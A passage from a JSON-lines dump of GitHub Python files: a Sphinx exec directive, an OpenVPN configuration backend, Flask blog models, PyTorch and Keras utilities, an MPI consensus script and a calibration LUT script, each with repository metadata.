'\\xe5\\x9f\\xba\\xe4\\xba\\x8e\\xe5\\xb7\\xa5\\xe4\\xbf\\xa1\\xe9\\x83\\xa8\\xe5\\x9f\\xba\\xe7\\xba\\xbf\\xe7\\x9a\\x84\\xe4\\xbd\\x93\\xe6\\xa3\\x80\\xe4\\xbb\\xbb\\xe5\\x8a\\xa1', '\\xe6\\xa3\\x80\\xe6\\xb5\\x8b\\xe4\\xb8\\xbb\\xe6\\x9c\\xba', '1', '16:06:00', '3', None, '1', '10000001', '1', 'zjyw', '20160621102320', '1', '1', '\\xe6\\x9c\\x89\\xe4\\xbd\\x93\\xe6\\xa3\\x80\\xe9\\xa1\\xb9\\xe6\\x9c\\xaa\\xe9\\x80\\x9a\\xe8\\xbf\\x87\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe6\\x9c\\x89\\xe4\\xbd\\x93\\xe6\\xa3\\x80\\xe9\\xa1\\xb9\\xe6\\x9c\\xaa\\xe6\\xa0\\xb8\\xe6\\x9f\\xa5', '2016-07-26 06:36:47', '20160625011010', '2016-04-06 20:33:20')\n \"\"\"\n sql_id = \"select * from AgentTask\"\n cur.execute(sql_id)\n rs = cur.fetchall()\n print( \"=========%s\"%repr(rs) )\n# task_id = datetime.datetime.now().strftime(\"%Y%m%d\")+str(int(rs[0][0]))\n# print( \"=========%s\"%task_id )","repo_name":"chengdg/zjyw","sub_path":"src/oa/aa.py","file_name":"aa.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28336170149","text":"import sys\nimport traceback\nfrom os.path import basename\n\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\nfrom sphinx.util.compat import Directive\nfrom docutils import nodes, statemachine\n\n\nclass PyExecDirective(Directive):\n \"\"\"\n Execute the specified python code and insert the output into the document\n \"\"\"\n has_content = True\n\n def run(self):\n # Number of spaces to indent on output\n tab_width = self.options.get('tab-width')\n code = self.content\n return self.exec_to_state_machine(code, tab_width)\n\n def exec_to_state_machine(self, code, tab_width=None):\n oldStdout, sys.stdout = sys.stdout, StringIO()\n\n if tab_width is None:\n # use default if not given as an option\n tab_width = self.state.document.settings.tab_width\n\n # get the path to this rST source file\n # for inserting directly to state_machine\n source = self.state_machine.input_lines.source(\n self.lineno - self.state_machine.input_offset - 1)\n try:\n exec('\\n'.join(code))\n\n # convert the multi-line string from stdout\n # into a list of single-line strings\n lines = statemachine.string2lines(\n sys.stdout.getvalue(),\n tab_width, convert_whitespace=True)\n\n # insert the list of strings at the source\n # of the original directive call\n self.state_machine.insert_input(lines, source)\n\n return []\n except Exception:\n document = self.state.document\n error_src = (\n \"Unable to execute python code at %s:%d:\" % (\n basename(source), self.lineno)\n )\n trace = '\\n'.join(traceback.format_exception(*sys.exc_info()))\n return [\n nodes.error(\n None,\n nodes.paragraph(text=error_src),\n nodes.literal_block(text=trace)\n ),\n document.reporter.error(\n \"problem executing python code\\n\"\n \"-- traceback included in document\"\n )\n ]\n finally:\n sys.stdout = oldStdout\n\n\ndef setup(app):\n app.add_directive('pyexec', PyExecDirective)\n","repo_name":"jrcartee/django-sphinx-ext","sub_path":"pyexec.py","file_name":"pyexec.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"25405232318","text":"from __future__ import with_statement\n\nimport IPy\nfrom IPy import IP\nfrom os import unlink\nfrom os.path import exists, join\nfrom twisted.internet.defer import inlineCallbacks, returnValue\n\nfrom ufwi_rpcd.backend.error import RpcdError\nfrom ufwi_rpcd.backend.exceptions import ConfigError\nfrom ufwi_rpcd.backend import tr\nfrom ufwi_rpcd.backend.use_cert_component import UseCertificateComponent\nfrom ufwi_rpcd.common.abstract_cfg import DatastructureIncompatible\nfrom ufwi_rpcd.common.download import encodeFileContent\nfrom ufwi_rpcd.core.config.responsible import CONFIG_AUTOCONFIGURATION, \\\n CONFIG_MODIFICATION\nfrom ufwi_rpcd.core.context import Context\nfrom ufwi_conf.backend.unix_service import ConfigServiceComponent\nfrom ufwi_conf.common.netcfg import deserializeNetCfg\nfrom ufwi_conf.common.net_objects import Net\nfrom ufwi_conf.common.openvpn_cfg import (OpenVpnConf, OPENVPN_CLIENT_CONF_UNAVAILABLE,\n OPENVPN_CLIENT_TOO_OLD, OPENVPN_INVALID_CONFIGURATION)\n\nfrom ufwi_conf.common.resolvcfg import deserialize as deserializeResolv\n\nfrom .error import OpenVpnError\n\ndef split_net(network):\n net = IPy.IP(network)\n return net.net().strNormal(), net.strNetmask()\n\ndef _pushRoute(network):\n \"\"\"\n Accepts\n - ufwi_conf.common.net_objects.Net objects\n - IPy.IP\n and formats a datastructure for the template\n \"\"\"\n if isinstance(network, IP):\n net = network\n elif isinstance(network, Net):\n net = network.net\n else:\n raise ValueError(\"Invalid type: %s\" % type(network))\n\n route_def = {\n 'net_addr': net.net().strNormal(),\n 'netmask': net.netmask().strNormal()\n }\n return route_def\n\ndef _acceptclient(context):\n if not context.isUserContext():\n #accept components\n return True\n if not context.user.client_name:\n return True\n if context.user.client_name.lower() not in ('eas', 'nfas'):\n #ufwi_rpcd_client and anything accepted\n return True\n if context.user.client_release is None:\n return False\n #For 4.0.13, client_release is None\n #For 4.0.14, client_release == '4.0.14'. For now we accept future clients\n return True\n\ndef _includeNet(network, default_gateways):\n \"\"\"\n User comes from internet. It is unlikely that he'd be going back to the\n lan containing the default gateway (and internet).\n\n It is very likely, on the other hand, that the EdenWall has more than\n one LAN and that we export at least one LAN.\n \"\"\"\n for default_gateway in default_gateways:\n if network.net.overlaps(default_gateway):\n return False\n return True\n\nclass OpenvpnComponent(ConfigServiceComponent, UseCertificateComponent):\n \"\"\"\n Manage a Openvpn server\n \"\"\"\n NAME = \"openvpn\"\n MASTER_KEY = NAME\n VERSION = \"1.0\"\n\n ACLS = {\n 'resolv': set(('getResolvConfig',)),\n 'network': set(('getNetconfig',)),\n 'nupki': set(('copyPKI', 'copyCRL', )),\n 'config': set(('apply', 'reset', )),\n }\n\n REQUIRES = ('config', 'network')\n CONFIG_DEPENDS = frozenset(('network', 'resolv'))\n\n ROLES = {\n 'conf_read': set(('getClientConfig', 'getOpenVpnConfig',\n 'runtimeFiles', 'getCertificatesInfo')),\n 'conf_write': set(('setOpenVpnConfig',)),\n 'dpi_read': set(('getOpenVpnConfig',)),\n }\n\n PIDFILE = \"/var/run/openvpn.server.pid\"\n #I'd rather not use the exe name because it is not specific of a client or a particular server.\n #(many openvpn instances can coexist)\n #EXE_NAME=\"openvpn\"\n\n INIT_SCRIPT = \"openvpn\"\n INITRANK_S = 16\n INITRANK_K = 80\n\n check_vpn_port = ConfigServiceComponent.check_port\n check_vpn_address = ConfigServiceComponent.check_ip\n # TODO check the vpn_netmask\n\n OPENVPN_BASE = '/etc/openvpn'\n CERT_PATH = join(OPENVPN_BASE, 'server.crt')\n KEY_PATH = join(OPENVPN_BASE, 'server.key')\n CRL_PATH = join(OPENVPN_BASE, 'server.crl')\n CA_PATH = join(OPENVPN_BASE, 'ca.crt')\n\n CLIENT_CONF = join(OPENVPN_BASE, 'client.ovpn')\n SERVER_CONF = join(OPENVPN_BASE, 'server.conf')\n CONF_FILES = CLIENT_CONF, SERVER_CONF\n\n #override UseCertificateComponent value\n CERT_OWNER_AND_GROUP = \"openvpn\", \"openvpn\"\n\n #apply_config is inherited\n\n def __init__(self):\n ConfigServiceComponent.__init__(self)\n UseCertificateComponent.__init__(self)\n self.openvpn_cfg = self.context = self.core = None\n\n def init(self, core):\n UseCertificateComponent.init(self, core)\n self.context = Context.fromComponent(self)\n for filename in self.CONF_FILES:\n self.addConfFile(filename, 'root:root', '0644')\n ConfigServiceComponent.init(self, core)\n\n @inlineCallbacks\n def init_done(self):\n config_version = self.openvpn_cfg.getReceivedSerialVersion()\n if config_version < 4:\n if not self.openvpn_cfg.manual_pushed_routes and self.should_run(None):\n self.critical(\n \"A configuration with version %d was read, and no pushed \"\n \"routes were defined in it. Adding all routes. and saving\" %\n config_version\n )\n if self._append_all_routes():\n yield self.core.callService(self.context, 'config', 'reset')\n self.save_config(\n \"openvpn : Adding pushed routes\",\n context=self.context,\n action=CONFIG_AUTOCONFIGURATION\n )\n yield self.core.callService(self.context, 'config', 'apply')\n else:\n self.critical(\"Could'nt find a route to add\")\n else:\n self.debug(\"Not need to add any routes.\")\n\n def read_config(self, *args, **kwargs):\n try:\n serialized = self.core.config_manager.get(self.MASTER_KEY)\n except (ConfigError, KeyError):\n self.warning('Openvpn not configured, default values loaded.')\n self.openvpn_cfg = OpenVpnConf()\n return\n\n try:\n self.openvpn_cfg = OpenVpnConf.deserialize(serialized)\n except DatastructureIncompatible:\n self.openvpn_cfg = OpenVpnConf.deserialize(serialized)\n\n def should_run(self, responsible):\n if not self.openvpn_cfg.enabled:\n if responsible:\n responsible.feedback(tr(\"Explicitely disabled.\"))\n return False\n if not self.openvpn_cfg.client_network:\n if responsible:\n responsible.feedback(\n tr(\"No client network was defined, disabling server.\")\n )\n return False\n return True\n\n def _template_variables(self, responsible, resolvcfg):\n # The server will listen on 0.0.0.0.\n net, mask = split_net(\n self.openvpn_cfg.client_network\n )\n yield 'client_network', net\n yield 'netmask_long_format', mask\n\n #For client.ovpn.\n yield 'server_address', self.openvpn_cfg.server\n\n yield 'port', self.openvpn_cfg.port\n yield 'protocol', self.openvpn_cfg.protocol\n yield 'redirect', self.openvpn_cfg.redirect\n yield 'disable_crl', self.openvpn_cfg.disable_crl\n\n yield 'domain', resolvcfg.domain\n yield 'nameserver1', resolvcfg.nameserver1\n yield 'nameserver2', resolvcfg.nameserver2\n\n routes = []\n\n for network in self.openvpn_cfg.manual_pushed_routes:\n routes.append(_pushRoute(network))\n yield 'routes', routes\n\n @inlineCallbacks\n def _fetchResolv(self):\n context = Context.fromComponent(self)\n\n serialized_resolvcfg = yield self.core.callService(\n context, 'resolv', 'getResolvConfig'\n )\n\n resolvcfg = deserializeResolv(serialized_resolvcfg)\n returnValue(resolvcfg)\n\n\n @inlineCallbacks\n def genConfigFiles(self, responsible):\n #FIXME: id 'read_config' call really useful?\n self.read_config()\n\n if not self.should_run(responsible):\n for filename in self.CONF_FILES:\n if exists(filename):\n unlink(filename)\n return\n\n resolvcfg = yield self._fetchResolv()\n\n template_variables = dict(\n self._template_variables(responsible, resolvcfg)\n )\n\n self.generate_configfile(template_variables)\n\n #svn commit r19729:\n #auth_cert, openvpn: don't set SSL in apply_config() in a restoration\n #To avoid nupki.copyPKI() error if the PKI doesn't exist anymore.\n if not responsible.isRestoring():\n ssl_conf = self.openvpn_cfg.getSSLDict()\n yield self._setSSLConfig(ssl_conf)\n\n self.setCertsOwnership()\n\n def save_config(self, message, context=None, action=None):\n with self.core.config_manager.begin(self, context, action=action) as cm:\n try:\n cm.delete(self.MASTER_KEY)\n except ConfigError:\n pass\n cm.set(self.MASTER_KEY, self.openvpn_cfg.serialize())\n cm.commit(message)\n\n def get_ports(self):\n return [{'proto': self.openvpn_cfg.protocol,\n 'port': self.openvpn_cfg.port}]\n\n def check_vpn_proto(self, value):\n return value in ('tcp', 'udp')\n\n # Services:\n def service_getOpenVpnConfig(self, context):\n serialized = self.openvpn_cfg.serialize()\n\n if _acceptclient(context):\n return serialized\n\n #sending for v3\n self.debug(\"Downgrading openvpn conf - will be read only for that client\")\n return self.openvpn_cfg.downgradeFields(serialized, 2)\n\n def service_setOpenVpnConfig(self, context, serialized, message):\n if not _acceptclient(context):\n raise OpenVpnError(OPENVPN_CLIENT_TOO_OLD, tr('Impossible to '\n 'configure openvpn with this frontend version; '\n 'please upgrade'))\n openvpn_cfg = OpenVpnConf.deserialize(serialized)\n is_valid, msg = openvpn_cfg.isValidWithMsg()\n if is_valid:\n self.openvpn_cfg = openvpn_cfg\n self.save_config(message, context=context, action=CONFIG_MODIFICATION)\n else:\n raise OpenVpnError(OPENVPN_INVALID_CONFIGURATION, msg)\n\n def service_sendFile(self, context, type_, encoded_bin):\n # deprecated\n raise RpcdError(tr('Your EAS is too old to change the certificate configuration, please upgrade it.'))\n\n def service_copyPKI(self, context, pkiname, cname):\n # deprecated\n raise RpcdError(tr('Your EAS is too old to change the certificate configuration, please upgrade it.'))\n\n def service_getClientConfig(self, context):\n \"\"\"\n Return a string containing a configuration for a client.\n \"\"\"\n try:\n with open(self.CLIENT_CONF) as fd:\n return encodeFileContent(fd.read())\n except IOError:\n raise OpenVpnError(OPENVPN_CLIENT_CONF_UNAVAILABLE,\n tr('The client configuration for VPN client is not available. '\n 'Have you configured the VPN client service, '\n 'then saved and applied the configuration?'))\n\n # TODO : factorize with auth_cert, aka authentication, aka nuauth\n def service_runtimeFiles(self, context):\n cert_files = (self.CERT_PATH, self.KEY_PATH, self.CRL_PATH, self.CA_PATH)\n cert_tuples = [(cert, 'bin') for cert in cert_files]\n return {'added': cert_tuples}\n\n def service_runtimeFilesModified(self, context):\n #Nothing to do because the config module will reload us\n pass\n\n # TODO : factorize with auth_cert, aka authentication, aka nuauth\n def _getSSLConfig(self):\n return self.openvpn_cfg.getSSLDict()\n\n def _append_all_routes(self):\n \"\"\"\n When importing an old config without any manual pushed routes\n \"\"\"\n changed = False\n\n #fetch net config\n netconfig = self.core.config_manager.get('network')\n netcfg = deserializeNetCfg(netconfig)\n\n #fetch default routes and gateways\n default_routes = tuple(netcfg.iterRoutes(default_only=True))\n #default_gateways: IPy.IP\n default_gateways = tuple(route.router for route in default_routes)\n\n #add everything into config\n for network in netcfg.iterNetworks(include_ha=False):\n if _includeNet(network, default_gateways):\n self.openvpn_cfg.manual_pushed_routes += (network.net, )\n changed = True\n\n return changed\n\n","repo_name":"maximerobin/Ufwi","sub_path":"etude_de_base/ufwi-administration-suite-ufwi-conf/ufwi_conf/backend/components/openvpn/openvpn.py","file_name":"openvpn.py","file_ext":"py","file_size_in_byte":12654,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"308745337","text":"import os\nimport pandas as pd\nfrom PIL import Image\nfrom torch.utils.data import Dataset\n\nclass PairedCropsDataset(Dataset):\n def __init__(self, annotations_file, img_dir, transform=None, target_transform=None, eval=False):\n self.img_labels = pd.read_csv(annotations_file)\n self.img_dir = img_dir\n self.transform = transform\n self.target_transform = target_transform\n self.eval = eval\n\n def __len__(self):\n return len(self.img_labels)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.img_dir, self.img_labels.iloc[idx, 0])\n label = self.img_labels.iloc[idx, 1]\n image_pair = None\n if label == 0:\n # we'll send the null crops through both models, disregarding crop size\n image = Image.open(img_path)\n if self.transform:\n image = self.transform(image)\n\n image_pair = [image, image]\n else:\n small_img_path = img_path + \"_0.jpg\"\n large_img_path = img_path + \"_1.jpg\"\n small_img = Image.open(small_img_path)\n large_img = Image.open(large_img_path)\n if self.transform:\n small_img = self.transform(small_img)\n large_img = self.transform(large_img)\n\n image_pair = [small_img, large_img]\n\n if self.target_transform:\n label = self.target_transform(label)\n if self.eval:\n return image_pair, label, img_path\n else:\n return image_pair, label\n","repo_name":"michaelduan8/sidewalk-cv-2021","sub_path":"datatypes/paired_dataset.py","file_name":"paired_dataset.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"14596260696","text":"\"\"\"Post model and related functions.\"\"\"\n\nfrom app.flask_app import db\nfrom app.models import utils\n\n\nclass Post(db.Model):\n\n \"\"\"A blog post.\"\"\"\n\n id = db.Column(db.Integer, primary_key=True)\n\n # Wordpress stuff.\n post_id = db.Column(db.Integer, unique=True)\n status = db.Column(db.Unicode)\n title = db.Column(db.Unicode)\n content = db.Column(db.Unicode)\n epoch = db.Column(db.Integer)\n link = db.Column(db.Unicode)\n location = db.Column(db.Unicode)\n\n # These may be real or may be synthetic based off GPS positions.\n latitude = db.Column(db.Float)\n longitude = db.Column(db.Float)\n\n\ndef PostRange(start=None, end=None, private=False):\n \"\"\"Return a query object with optional start and end filters specified.\"\"\"\n query = Post.query.filter()\n if not private:\n query = Post.query.filter(Post.status == 'publish')\n if start is not None:\n query = query.filter(Post.epoch >= start)\n if end is not None:\n query = query.filter(Post.epoch <= end)\n return query\n\n\ndef GetPost(our_id, private=False):\n \"\"\"Return a Post query by our id.\"\"\"\n query = Post.query.filter(Post.id == our_id)\n if not private:\n query = query.filter(Post.status == 'publish')\n return query\n\n\ndef GetPostDict(our_id, private=False):\n \"\"\"Return a Post dictionary by our id.\"\"\"\n query = GetPost(our_id, private=private)\n post = query.first()\n if not post:\n return None\n post_dict = utils.AsDict(post)\n content = post_dict['content']\n post_dict['content'] = '

' + content.replace('\\n\\n', '

') + '

'\n return post_dict\n\n\ndef GetPostDictList(private=False):\n \"\"\"Return a list of abbreviated Post dictionaries.\"\"\"\n query = PostRange(private=private)\n posts = utils.RowsAsDicts(query, only=None, skip=['content'])\n return posts\n\n\ndef SavePosts(posts):\n \"\"\"Save new posts and update existing posts.\"\"\"\n old_posts = {}\n for post in posts:\n old = Post.query.filter(Post.post_id == post.post_id).first()\n if old:\n old_posts[post.post_id] = old\n\n for post in posts:\n if post.post_id not in old_posts:\n db.session.add(post)\n else:\n old = old_posts[post.post_id]\n old.post_id = post.post_id\n old.status = post.status\n old.title = post.title\n old.content = post.content\n old.epoch = post.epoch\n old.link = post.link\n old.location = post.location\n old.latitude = post.latitude\n old.longitude = post.longitude\n db.session.commit()\n\n\ndef UpdatePosts(posts):\n \"\"\"Commit changes to updated posts.\"\"\"\n db.session.commit()\n","repo_name":"brendanebers/wheresbrendan","sub_path":"app/models/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35711934869","text":"import os\nfrom flask import Blueprint, render_template, request, current_app\nfrom flaskblog.models import Post, PostComment\n\nmain = Blueprint('main', __name__)\n\n\n@main.route(\"/\")\n@main.route(\"/home\")\n# @login_required\ndef home():\n exist_pics = os.listdir(os.path.join(current_app.root_path + '/static/profile_pics'))\n page = request.args.get(\"page\", 1, type=int)\n posts = Post.query.order_by(Post.date_posted.desc()).paginate(per_page=20, page=page)\n comments_counter = {post.id: PostComment.query.filter_by(post=post).count() for post in posts.items}\n\n return render_template(\"home.html\", posts=posts, exist_pics=exist_pics, comments_counter=comments_counter)\n\n\n@main.route(\"/about\")\ndef about():\n return render_template(\"about.html\", title=\"About\")","repo_name":"rtmkibish/flask","sub_path":"test_app/flaskblog/main/routs.py","file_name":"routs.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73083295449","text":"import keras.backend as K\nimport numpy as np\nfrom PIL import Image, ImageDraw\n\ndef get_activations(model, model_inputs, print_shape_only=False, layer_name=None):\n\tprint('----- activations -----')\n\tactivations = []\n\tinp = model.input\n\n\tmodel_multi_inputs_cond = True\n\tif not isinstance(inp, list):\n\t\t# only one input! let's wrap it in a list.\n\t\tinp = [inp]\n\t\tmodel_multi_inputs_cond = False\n\n\t#from pprint import pprint\n\t#pprint(vars(model.layers[3]))\n\n\tfor layer in model.layers:\n\t\tprint(layer.name, len(layer.outbound_nodes), len(layer.inbound_nodes))\n\t\tfor I in range(len(layer.inbound_nodes)):\n\t\t\to1 = layer.get_output_at(I)\n\t\t\tprint(o1.name, o1.shape)\n\t\t\t\n\toutputs = [[layer.get_output_at(I) for I in range(len(layer.inbound_nodes))] for layer in model.layers if (layer.name == layer_name or layer_name is None)]\n\toutputs = [item for sublist in outputs for item in sublist]\n\t#outputs.extend([])\n\n\tfuncs = [K.function(inp + [K.learning_phase()], [out]) for out in outputs] # evaluation functions\n\n\tif model_multi_inputs_cond:\n\t\tlist_inputs = []\n\t\tlist_inputs.extend(model_inputs)\n\t\tlist_inputs.append(0.)\n\telse:\n\t\tlist_inputs = [model_inputs, 0.]\n\n\tprint(\"model_multi_inputs_cond\", model_multi_inputs_cond, len(list_inputs))\n\t# Learning phase. 0 = Test mode (no dropout or batch normalization)\n\t# layer_outputs = [func([model_inputs, 0.])[0] for func in funcs]\n\tlayer_outputs = [func(list_inputs)[0] for func in funcs]\n\tfor layer_activations in layer_outputs:\n\t\tactivations.append(layer_activations)\n\t\tif print_shape_only:\n\t\t\tprint(layer_activations.shape)\n\t\telse:\n\t\t\tprint(layer_activations)\n\treturn activations\n\ndef toRGBImage(x):\n\tim = Image.fromarray(x)\n\tim = im.convert('RGB') \n\treturn np.array(im, dtype='uint8')\n\ndef\tprediction_to_image(prediction, meanImage):\n\tpredOutput = np.array(prediction)*255.0\n\tpredOutput = predOutput + meanImage\n\tpredOutput[predOutput<0] = 0\n\tpredOutput[predOutput>255] = 255\n\tpredOutput = np.array(predOutput, dtype=\"uint8\")\n\tpredImage = np.squeeze(predOutput)\n\treturn predImage\n\t\ndef draw_reward(predImage, reward):\n\tim = Image.fromarray(predImage)\n\tdraw = ImageDraw.Draw(im)\n\tw = 100\n\tx = 57\n\tdraw.rectangle([x,196,x+int(w*reward),208], \"#fff\", None)\n\tdraw.rectangle([x,196,x+w,208], None, \"#f00\")\n\tpredImage = np.array(im)\n\treturn predImage\n\ndef get_obs_input(lastFramesOrig, meanImage):\n\tnetin = np.array(lastFramesOrig, dtype='f')/255.0\n\tnetin = np.squeeze(netin)\n\tnetin = np.transpose(netin, (0,3,1,2))\n\tnetin = np.reshape(netin, (12, 210,160))\n\tnetin = netin - np.tile(np.transpose(meanImage/255.0, (2,0,1)), (4,1,1))\n\tnetin = np.reshape(netin, (1, 12, 210,160))\n\treturn netin\n\t","repo_name":"basarane/model-based-rl","sub_path":"src/old_code/utils_old.py","file_name":"utils_old.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24499248214","text":"from mpi4py import MPI\r\nimport numpy as np\r\nimport sys\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom numpy.random import random\r\n\r\nimport create_matrix as cm\r\nimport calculate_function as cf\r\n\r\nmax_iterations = 50\r\nworld = MPI.COMM_WORLD\r\nworld_size = world.Get_size()\r\nrank = world.Get_rank()\r\nname = MPI.Get_processor_name()\r\n\r\n\r\ndef load_adj_matrix():\r\n input = cm.createAdjM(world_size)\r\n\r\n #print(input.todense())\r\n return input\r\n\r\n# TODO MATRICE DEI PESI @DA FARE\r\n\r\n\r\ndef out_neighbors_of_node(x):\r\n # lista di riceventi di riga/nodo x\r\n\r\n matrix = load_adj_matrix()\r\n list_out_neighbors = []\r\n # shape[1], numero colonne della matrice\r\n for i in range(0, matrix.shape[1]):\r\n if matrix[x, i] == 1:\r\n list_out_neighbors.append(i)\r\n return list_out_neighbors\r\n\r\n\r\ndef in_neighbors_of_node(x):\r\n # lista di chi invia alla colonna/nodo x\r\n\r\n matrix = load_adj_matrix()\r\n list_in_neighbors = []\r\n # shape[0], numero righe della matrice\r\n for i in range(0, matrix.shape[0]):\r\n if matrix[i, x] == 1:\r\n list_in_neighbors.append(i)\r\n print(list_in_neighbors)\r\n return list_in_neighbors\r\n\r\n\r\ndef out_degree_of_node(x):\r\n return len(out_neighbors_of_node(x))\r\n\r\n\r\ndef in_degree_of_node(x):\r\n return len(in_neighbors_of_node(x))\r\n\r\n\r\ndef exchange_with_neighbors(data):\r\n # invia a tutti i vicini collegati\r\n out_neighbors_list = out_neighbors_of_node(rank)\r\n out_degree_of_actual_node = out_degree_of_node(rank)\r\n # # print( \"out of process\", rank, \"is made of: \", out_neighbors_list, \". Total:\",\r\n # out_degree_of_actual_node, \"element(s)\")\r\n for j in range(0, out_degree_of_actual_node):\r\n # BLOCCANTE\r\n\r\n world.send(data, dest=out_neighbors_list[j])\r\n\r\n # print(\"rank: \", rank, \" ha inviato \", data, \" (data) \", \" a: \", out_neighbors_list[j], \"\\n\")\r\n\r\n # sincronizza()\r\n\r\n # ricevi\r\n data_recv = []\r\n in_neighbors_list = in_neighbors_of_node(rank)\r\n in_neighbors_list = in_neighbors_of_node(rank)\r\n in_degree_of_actual_node = in_degree_of_node(rank)\r\n # print(\"in of process\", rank, \"is made of: \", in_neighbors_list, \". Total:\", in_degree_of_actual_node,\r\n # \"element(s)\")\r\n\r\n for j in range(0, in_degree_of_actual_node):\r\n # print(\"rank: \", rank, \" cerca di ricevere da: \", in_neighbors_list[j])\r\n\r\n # BLOCCANTE\r\n data_recv.append(world.recv(source=in_neighbors_list[j]))\r\n\r\n # print(\"rank: \", rank, \" ha ricevuto \", data_recv, \"da: \", in_neighbors_list[j], \"\\n\")\r\n\r\n sincronizza()\r\n return data_recv\r\n\r\n\r\n# def distribute_initial_constraints():\r\n# if (rank == 0):\r\n# data = 4\r\n# if (rank == 1):\r\n# data = 5\r\n# if (rank == 2):\r\n# data = 6\r\n# if (rank == 3):\r\n# data = 7\r\n\r\n\r\ndef sincronizza():\r\n sys.stdout.flush()\r\n world.Barrier()\r\n\r\n\r\ndef trova_media(iterazioni):\r\n # \"distribute initial constraint\" (fasullo) @DA FARE\r\n\r\n data = 0\r\n\r\n for i in range(0, world_size):\r\n if i == rank:\r\n data = 1 * random(5)\r\n dataQ = cm.createQ(1)\r\n dataR = cm.createR(1)\r\n \"\"\" \r\n if rank == 0:\r\n data = 1\r\n dataQ = cm.createQ(1)\r\n dataR = cm.createR(1)\r\n if rank == 1:\r\n data = 3\r\n dataQ = cm.createQ(1)\r\n dataR = cm.createR(1)\r\n if rank == 2:\r\n data = 5\r\n dataQ = cm.createQ(1)\r\n dataR = cm.createR(1)\r\n if rank == 3:\r\n data = 4\r\n dataQ = cm.createQ(1)\r\n dataR = cm.createR(1)\r\n \"\"\"\r\n print(\"data iniziale: \", dataQ, dataR)\r\n\r\n sincronizza()\r\n if rank == 0:\r\n print(\"numero iterazioni :\", iterazioni)\r\n\r\n sincronizza()\r\n\r\n for i in range(0, iterazioni):\r\n # print(\"*** Iterazione n:\", i, \" ***\")\r\n ricevuto = exchange_with_neighbors(data)\r\n\r\n # print(ricevuto[0] , \" da \", rank)\r\n\r\n data = (ricevuto[0] + data) / (in_degree_of_node(rank) + 1)\r\n # print(data)\r\n sincronizza()\r\n\r\n print(\"\\tconsenso: \", np.round(data, 2))\r\n\r\n\r\nsys.stdout.write(\"Hello, World! I am process %d of %d on %s.\\n\" % (rank, world_size, name))\r\nsincronizza()\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n matrice = load_adj_matrix()\r\n\r\n if matrice.shape[0] != world_size:\r\n print(\"NUMERO DI NODI DIVERSO DAL NUMERO DI NODI MATRICE\")\r\n sys.exit()\r\n\r\n if rank == 0:\r\n print(\"MATRICE DI ADIACENZA\")\r\n print(matrice)\r\n sincronizza()\r\n\r\n if rank == 0:\r\n print(\"\\n\\n\\t\\tprimo test...\\n\")\r\n sincronizza()\r\n trova_media(5)\r\n sincronizza()\r\n if rank == 0:\r\n print(\"\\n\\n\\t\\taltra prova...\\n\")\r\n\r\n sincronizza()\r\n trova_media(20)\r\n","repo_name":"leo93921/gradient_consensus","sub_path":"gradient_consensus.py","file_name":"gradient_consensus.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"40867718073","text":"#!/usr/bin/env python\nimport sys\nimport ROOT\nfrom GBR2LUT import GBR2LUT\nfrom GBR2LUTEmulator_test_newcal import GBR2LUTEmulator_test_newcal\n\ninputFile = \"/home/athachay/t3store3/l1egamma/emulationstuff/CMSSW_7_6_0/src/EG_Calibrations/L1EGCalibrations/RegressionTraining/CMSSW_122XSampleFiles_PF_eT/regressionRun3MC_122XSample_v0_results.root\"\nversion = \"v17.04.04\"\nsortedShapesFile = \"data/compressedSortedShapes.txt\"\nregresionName =\"pfetReg\"\noutputDir=\"./\"\nif len(sys.argv) < 2 :\n print(\"Please provide the results file !! \")\nif len(sys.argv) > 1 :\n inputFile=sys.argv[1]\nif len(sys.argv) > 2 :\n regresionName=sys.argv[2]\nif len(sys.argv) > 3 :\n outputDir=sys.argv[3]\n\nsuffix=\"_{}.txt\".format(version)\n\nprint( \"Reading the Input Result file File as : \", inputFile)\nprint( \"Reading the Sorted Shapes File as : \", sortedShapesFile)\nprint( \"Setting the output file name as : \", outputDir+regresionName+suffix )\n\n\nheader = \"\"\"\\\n# Calibration vs |ieta|,shape,E. Derived from Run 283478 data, with semi-parametric regression\n# The LUT output is (ET_off/ET_L1) between 0 and 2, encoded on 9 bits\n# Index is compressedShape+compressedE<<4+compressedIeta<<8. \n# Compression version is v4\n#anything after # is ignored with the exception of the header\n#the header is first valid line starting with #
versionStr(unused but may be in future) nrBitsAddress nrBitsData
\n#
V8 12 10
